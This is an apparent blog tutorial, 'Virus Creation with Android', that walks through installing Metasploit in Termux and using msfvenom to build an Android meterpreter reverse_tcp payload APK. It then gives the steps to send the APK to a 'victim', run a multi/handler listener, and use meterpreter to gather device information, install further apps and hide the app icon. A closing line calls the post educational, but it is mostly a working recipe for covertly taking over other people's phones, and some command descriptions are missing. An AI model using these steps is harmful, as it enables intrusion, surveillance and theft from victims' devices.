Virus Creation with Android
Previously we covered What is Metasploit?, How to install
Metasploit in Linux?, and how to use it in your Linux system?. Now we are going to install Termux in Metasploit.
To download Metasploit in Termux you need to execute the following commands in Termux one by one:
apt upgrade && update
This command upgrades and update your termux.
pkg install unstable-repo
It starts the installation process of unstable-repo in your termux.
apt install metasploit
By executing this command it starts the installation process of Metasploit
in your termux. It may take time depending on your internet speed
After all of this is done, then to check whether Metasploit is installed or not, simply type
msfvenom -v
This command shows you the version.
Then for the creation of the payload, it is similar we done previously
msfvenom -p android/meterpreter/reverse_tcp lhost = (Your local ip) lport
= 4444 > payload.apk
After creating this APK file move it to your internal storage by
mv payload.apk /sdcard
then send it to your victim using the server link we covered previously. Before sending this app to our victim we need to start the
listener using
After that type
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
after setting the payload you need to set lhost and lport
set lhost = (your host)
set lport = 4444
And then wait until the victim executes the payload. Now let us see some
meterpreter functions,
By typing this command it shows you the system information of the victim
device. Type help displays a set of commands with their functions.
Various Commands:
It gives you a list of applications installed on that device.
To leave the victim's device access.
To install the app on the victim's device before that we must need to upload that
upload /home/Ayush/Desktop/hack.apk
And then install using
app_install /home/Ayush/Desktop/hack.apk
Using this you can hide the icon of the application and make the app
This Post is just for Educational purposes!
Hope this post will help you to know more about Hacking using Android!
Thank You…!!!
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